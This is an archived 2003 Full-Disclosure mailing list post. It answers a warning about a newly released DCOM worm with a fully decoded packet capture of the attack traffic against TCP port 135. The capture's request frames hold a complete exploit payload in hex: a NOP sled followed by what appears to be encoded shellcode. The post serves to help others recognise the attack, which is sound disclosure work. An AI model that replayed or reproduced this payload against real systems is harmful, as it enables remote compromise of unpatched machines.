| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <ILEPILDHBOLAHHEIMALBEEPGGGAA.jasonc@science.org>
From: jasonc at science.org (Jason Coombs)
Subject: DCOM
Is this what you're seeing?
6 66.859375 BEFC20000500 XEROX 000000 MSRPC c/o RPC Bind: UUID
000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0
recv 0x16D0 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 8687500 microseconds
Frame: Frame number: 6
Frame: Total frame length: 126 bytes
Frame: Capture frame length: 126 bytes
Frame: Frame data: Number of data bytes remaining = 126 (0x007E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 126 (0x007E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070)
IP: ID = 0x1C04; Proto = TCP; Len: 112
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 112 (0x70)
IP: Identification = 7172 (0x1C04)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0138
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 92 (0x005C)
TCP: .AP..., len: 72, seq:3551092873-3551092945, ack: 188699400, win: 8160,
src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092873 (0xD3A96089)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xC46A
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 72 (0x0048)
MSRPC: c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call
0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved
(AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent
multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute
guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call
semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the
optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 72 (0x48)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 0 (0x0)
MSRPC: Presentation Context List
MSRPC: Number of Context Elements = 1 (0x1)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Number of Transfer Syntaxs = 1 (0x1)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Abstract Interface Version = 0 (0x0)
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......?? .....E.
00010: 00 70 1C 04 40 00 7D 06 01 38 43 1E AE D6 43 1E .p..@....8C.??C.
00020: AB 39 0F 03 00 87 D3 A9 60 89 0B 3F 53 08 50 18 ?9...???`?.?S.P.
00030: 1F E0 C4 6A 00 00 05 00 0B 03 10 00 00 00 48 00 .??j..........H.
00040: 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 .....?.?.......
00050: 00 00 01 00 01 00 A0 01 00 00 00 00 00 00 C0 00 ......?.......?.
00060: 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C .....F.....]???.
00070: C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 ?.??..+.H`....
7 66.859375 XEROX 000000 BEFC20000500 MSRPC c/o RPC Bind Ack: call 0x7F
assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 WIN2KDEV 67.30.174.214 IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 7
Frame: Total frame length: 114 bytes
Frame: Capture frame length: 114 bytes
Frame: Frame data: Number of data bytes remaining = 114 (0x0072)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : BEFC20000500
ETHERNET: .......0 = Individual address
ETHERNET: ......1. = Locally administered address
ETHERNET: Source address : 000005000000
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 114 (0x0072)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 100 (0x0064)
IP: ID = 0x1E94; Proto = TCP; Len: 100
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 100 (0x64)
IP: Identification = 7828 (0x1E94)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFBB3
IP: Source Address = 67.30.171.57
IP: Destination Address = 67.30.174.214
IP: Data: Number of data bytes remaining = 80 (0x0050)
TCP: .AP..., len: 60, seq: 188699400-188699460, ack:3551092945, win: 8088,
src: 135 dst: 3843
TCP: Source Port = Location Service
TCP: Destination Port = 0x0F03
TCP: Sequence Number = 188699400 (0xB3F5308)
TCP: Acknowledgement Number = 3551092945 (0xD3A960D1)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8088 (0x1F98)
TCP: Checksum = 0xEDFA
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 60 (0x003C)
MSRPC: c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv
0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind Ack
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved
(AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent
multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute
guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call
semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the
optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 60 (0x3C)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 37081 (0x90D9)
MSRPC: Secondary Address
MSRPC: Secondary Address Length = 4 (0x4)
MSRPC: Secondary Address Port
MSRPC: Padding Byte(s)
MSRPC: Result List
MSRPC: Number of Results = 1 (0x1)
MSRPC: Reserved = 0 (0x0)
MSRPC: Reserved 2
MSRPC: Presentation Context Results
MSRPC: Result = Acceptance
MSRPC: Reason = Reason not specified
MSRPC: Transfer Syntax
MSRPC: Transfer Interface UUID =
8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
00000: BE FC 20 00 05 00 00 00 05 00 00 00 08 00 45 00 ?? ...........E.
00010: 00 64 1E 94 40 00 80 06 FB B3 43 1E AB 39 43 1E .d.?@...??C.?9C.
00020: AE D6 00 87 0F 03 0B 3F 53 08 D3 A9 60 D1 50 18 ??.?...?S.??`?P.
00030: 1F 98 ED FA 00 00 05 00 0C 03 10 00 00 00 3C 00 .???..........<.
00040: 00 00 7F 00 00 00 D0 16 D0 16 D9 90 00 00 04 00 .....?.?.??....
00050: 31 33 35 00 00 00 01 00 00 00 00 00 00 00 04 5D 135............]
00060: 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 ???.?.??..+.H`..
00070: 00 00 ..
8 67.281250 BEFC20000500 XEROX 000000 MSRPC c/o RPC Request: call 0xE5
opnum 0x4 context 0x1 hint 0x690 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.827
Frame: Time delta from previous physical frame: 421875 microseconds
Frame: Frame number: 8
Frame: Total frame length: 1414 bytes
Frame: Capture frame length: 1414 bytes
Frame: Frame data: Number of data bytes remaining = 1414 (0x0586)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 1414 (0x0586)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 1400 (0x0578)
IP: ID = 0x1C05; Proto = TCP; Len: 1400
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 1400 (0x578)
IP: Identification = 7173 (0x1C05)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFC2E
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 1380 (0x0564)
TCP: .A...., len: 1360, seq:3551092945-3551094305, ack: 188699400, win: 8160,
src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092945 (0xD3A960D1)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x10 : .A....
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....0... = No Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0x9219
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 1360 (0x0550)
MSRPC: c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved
(AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent
multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute
guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call
semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the
optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 1704 (0x6A8)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 229 (0xE5)
MSRPC: Bind Frame Number = 6 (0x6)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Allocation Hint = 1680 (0x690)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 4 (0x4)
MSRPC: Stub Data
00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......?? .....E.
00010: 05 78 1C 05 40 00 7D 06 FC 2E 43 1E AE D6 43 1E .x..@...?.C.??C.
00020: AB 39 0F 03 00 87 D3 A9 60 D1 0B 3F 53 08 50 10 ?9...???`?.?S.P.
00030: 1F E0 92 19 00 00 05 00 00 03 10 00 00 00 A8 06 .??...........?.
00040: 00 00 E5 00 00 00 90 06 00 00 01 00 04 00 05 00 ..?...?.........
00050: 06 00 01 00 00 00 00 00 00 00 32 24 58 FD CC 45 ..........2$X??E
00060: 64 49 B0 70 DD AE 74 2C 96 D2 60 5E 0D 00 01 00 dI?p??t,??`^....
00070: 00 00 00 00 00 00 70 5E 0D 00 02 00 00 00 7C 5E ......p^......|^
00080: 0D 00 00 00 00 00 10 00 00 00 80 96 F1 F1 2A 4D ..........????*M
00090: CE 11 A6 6A 00 20 AF 6E 72 F4 0C 00 00 00 4D 41 ?.?j. ?nr?....MA
000A0: 52 42 01 00 00 00 00 00 00 00 0D F0 AD BA 00 00 RB.........???..
000B0: 00 00 A8 F4 0B 00 20 06 00 00 20 06 00 00 4D 45 ..??.. ... ...ME
000C0: 4F 57 04 00 00 00 A2 01 00 00 00 00 00 00 C0 00 OW....?.......?.
000D0: 00 00 00 00 00 46 38 03 00 00 00 00 00 00 C0 00 .....F8.......?.
000E0: 00 00 00 00 00 46 00 00 00 00 F0 05 00 00 E8 05 .....F....?...?.
000F0: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC C8 00 ..........?????.
00100: 00 00 4D 45 4F 57 E8 05 00 00 D8 00 00 00 00 00 ..MEOW?...?.....
00110: 00 00 02 00 00 00 07 00 00 00 00 00 00 00 00 00 ................
00120: 00 00 00 00 00 00 00 00 00 00 C4 28 CD 00 64 29 ..........?(?.d)
00130: CD 00 00 00 00 00 07 00 00 00 B9 01 00 00 00 00 ?.........?.....
00140: 00 00 C0 00 00 00 00 00 00 46 AB 01 00 00 00 00 ..?......F?.....
00150: 00 00 C0 00 00 00 00 00 00 46 A5 01 00 00 00 00 ..?......F?.....
00160: 00 00 C0 00 00 00 00 00 00 46 A6 01 00 00 00 00 ..?......F?.....
00170: 00 00 C0 00 00 00 00 00 00 46 A4 01 00 00 00 00 ..?......F?.....
00180: 00 00 C0 00 00 00 00 00 00 46 AD 01 00 00 00 00 ..?......F?.....
00190: 00 00 C0 00 00 00 00 00 00 46 AA 01 00 00 00 00 ..?......F?.....
001A0: 00 00 C0 00 00 00 00 00 00 46 07 00 00 00 60 00 ..?......F....`.
001B0: 00 00 58 00 00 00 90 00 00 00 40 00 00 00 20 00 ..X...?...@... .
001C0: 00 00 38 03 00 00 30 00 00 00 01 00 00 00 01 10 ..8...0.........
001D0: 08 00 CC CC CC CC 50 00 00 00 4F B6 88 20 FF FF ..????P...O?? ??
001E0: FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ??..............
001F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 10 ................
00230: 08 00 CC CC CC CC 48 00 00 00 07 00 66 00 06 09 ..????H.....f...
00240: 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 10 00 ......?......F..
00250: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 ................
00260: 00 00 78 19 0C 00 58 00 00 00 05 00 06 00 01 00 ..x...X.........
00270: 00 00 70 D8 98 93 98 4F D2 11 A9 3D BE 57 B2 00 ..p????O?.?=?W?.
00280: 00 00 32 00 31 00 01 10 08 00 CC CC CC CC 80 00 ..2.1.....?????.
00290: 00 00 0D F0 AD BA 00 00 00 00 00 00 00 00 00 00 ...???..........
002A0: 00 00 00 00 00 00 18 43 14 00 00 00 00 00 60 00 .......C......`.
002B0: 00 00 60 00 00 00 4D 45 4F 57 04 00 00 00 C0 01 ..`...MEOW....?.
002C0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 3B 03 ......?......F;.
002D0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 ......?......F..
002E0: 00 00 30 00 00 00 01 00 01 00 81 C5 17 03 80 0E ..0.......??..?.
002F0: E9 4A 99 99 F1 8A 50 6F 7A 85 02 00 00 00 00 00 ?J????Poz?......
00300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00310: 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 30 00 ..........????0.
00320: 00 00 78 00 6E 00 00 00 00 00 D8 DA 0D 00 00 00 ..x.n.....??....
00330: 00 00 00 00 00 00 20 2F 0C 00 00 00 00 00 00 00 ...... /........
00340: 00 00 03 00 00 00 00 00 00 00 03 00 00 00 46 00 ..............F.
00350: 58 00 00 00 00 00 01 10 08 00 CC CC CC CC 10 00 X.........????..
00360: 00 00 30 00 2E 00 00 00 00 00 00 00 00 00 00 00 ..0.............
00370: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC 68 00 ..........????h.
00380: 00 00 0E 00 FF FF 68 8B 0B 00 02 00 00 00 00 00 ....??h?........
00390: 00 00 00 00 00 00 86 01 00 00 00 00 00 00 86 01 ......?.......?.
003A0: 00 00 5C 00 5C 00 46 00 58 00 4E 00 42 00 46 00 ..\.\.F.X.N.B.F.
003B0: 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 X.F.X.N.B.F.X.F.
003C0: 58 00 46 00 58 00 46 00 58 00 9D 13 00 01 CC E0 X.F.X.F.X.?...??
003D0: FD 7F CC E0 FD 7F 90 90 90 90 90 90 90 90 90 90 ??????????????
003E0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
003F0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00400: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00410: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00420: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00430: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00440: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00450: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00460: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ????????????????
00470: 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 19 5E ??????????????.^
00480: 31 C9 81 E9 89 FF FF FF 81 36 80 BF 32 94 81 EE 1????????6??2???
00490: FC FF FF FF E2 F2 EB 05 E8 E2 FF FF FF 03 53 06 ???????.?????.S.
004A0: 1F 74 57 75 95 80 BF BB 92 7F 89 5A 1A CE B1 DE .tWu??????Z.???
004B0: 7C E1 BE 32 94 09 F9 3A 6B B6 D7 9F 4D 85 71 DA |??2?.?:k???M?q?
004C0: C6 81 BF 32 1D C6 B3 5A F8 EC BF 32 FC B3 8D 1C ???2.??Z???2???.
004D0: F0 E8 C8 41 A6 DF EB CD C2 88 36 74 90 7F 89 5A ???A??????6t??Z
004E0: E6 7E 0C 24 7C AD BE 32 94 09 F9 22 6B B6 D7 4C ?~.$|??2?.?"k??L
004F0: 4C 62 CC DA 8A 81 BF 32 1D C6 AB CD E2 84 D7 F9 Lb?????2.???????
00500: 79 7C 84 DA 9A 81 BF 32 1D C6 A7 CD E2 84 D7 EB y|?????2.???????
00510: 9D 75 12 DA 6A 80 BF 32 1D C6 A3 CD E2 84 D7 96 ?u.?j??2.???????
00520: 8E F0 78 DA 7A 80 BF 32 1D C6 9F CD E2 84 D7 96 ??x?z??2.???????
00530: 39 AE 56 DA 4A 80 BF 32 1D C6 9B CD E2 84 D7 D7 9?V?J??2.???????
00540: DD 06 F6 DA 5A 80 BF 32 1D C6 97 CD E2 84 D7 D5 ?.??Z??2.???????
00550: ED 46 C6 DA 2A 80 BF 32 1D C6 93 01 6B 01 53 A2 ?F??*??2.??.k.S?
00560: 95 80 BF 66 FC 81 BE 32 94 7F E9 2A C4 D0 EF 62 ???f???2??*???b
00570: D4 D0 FF 62 6B D6 A3 B9 4C D7 E8 5A 96 80 AE 6E ???bk???L??Z???n
00580: 1F 4C D5 24 C5 D3 .L?$??
9 67.390625 BEFC20000500 XEROX 000000 TCP .AP..., len: 344,
seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135
67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.936
Frame: Time delta from previous physical frame: 109375 microseconds
Frame: Frame number: 9
Frame: Total frame length: 398 bytes
Frame: Capture frame length: 398 bytes
Frame: Frame data: Number of data bytes remaining = 398 (0x018E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 398 (0x018E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 384 (0x0180)
IP: ID = 0x1C06; Proto = TCP; Len: 384
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 384 (0x180)
IP: Identification = 7174 (0x1C06)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0026
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 364 (0x016C)
TCP: .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160,
src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551094305 (0xD3A96621)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xDBD3
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 344 (0x0158)
00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......?? .....E.
00010: 01 80 1C 06 40 00 7D 06 00 26 43 1E AE D6 43 1E .?..@....&C.??C.
00020: AB 39 0F 03 00 87 D3 A9 66 21 0B 3F 53 08 50 18 ?9...???f!.?S.P.
00030: 1F E0 DB D3 00 00 40 64 B4 D7 EC CD C2 A4 E8 63 .???..@...?????c
00040: C7 7F E9 1A 1F 50 D7 57 EC E5 BF 5A F7 ED DB 1C ??..P?W???Z???.
00050: 1D E6 8F B1 78 D4 32 0E B0 B3 7F 01 5D 03 7E 27 .???x?2.??.].~'
00060: 3F 62 42 F4 D0 A4 AF 76 6A C4 9B 0F 1D D4 9B 7A ?bB????vj??..??z
00070: 1D D4 9B 7E 1D D4 9B 62 19 C4 9B 22 C0 D0 EE 63 .??~.??b.??"???c
00080: C5 EA BE 63 C5 7F C9 02 C5 7F E9 22 1F 4C D5 CD ???c??.??".L??
00090: 6B B1 40 64 98 0B 77 65 6B D6 93 CD C2 94 EA 64 k?@...wek??????d
000A0: F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E ?!?2??:???4r?.?.
000B0: 39 0B D7 3A 7F 89 34 72 A0 0B 17 8A 94 80 BF B9 9.?:?4r?..?????
000C0: 51 DE E2 F0 90 80 EC 67 C2 D7 34 5E B0 98 34 77 Q??????g??4^??4w
000D0: A8 0B EB 37 EC 83 6A B9 DE 98 34 68 B4 83 62 D1 ?.?7??j???4h??b?
000E0: A6 C9 34 06 1F 83 4A 01 6B 7C 8C F2 38 BA 7B 46 ??4..?J.k|??8?{F
000F0: 93 41 70 3F 97 78 54 C0 AF FC 9B 26 E1 61 34 68 ?Ap??xT????&?a4h
00100: B0 83 62 54 1F 8C F4 B9 CE 9C BC EF 1F 84 34 31 ??bT.???????.?41
00110: 51 6B BD 01 54 0B 6A 6D CA DD E4 F0 90 80 2F A2 Qk?.T.jm??????/?
00120: 04 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 ..\.C.$.\.1.2.3.
00130: 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00 4.5.6.1.1.1.1.1.
00140: 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
00150: 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10 1.1...d.o.c.....
00160: 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00 ..???? ...0.-...
00170: 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C ..?*..........(?
00180: 0C 00 01 00 00 00 07 00 00 00 00 00 00 00 ..............
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com]On Behalf Of Paul Marsh
Sent: Monday, August 11, 2003 8:56 AM
To: Full-Disclosure (E-mail)
Subject: [Full-Disclosure] DCOM
Looks like a worm has been released, check your logs.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists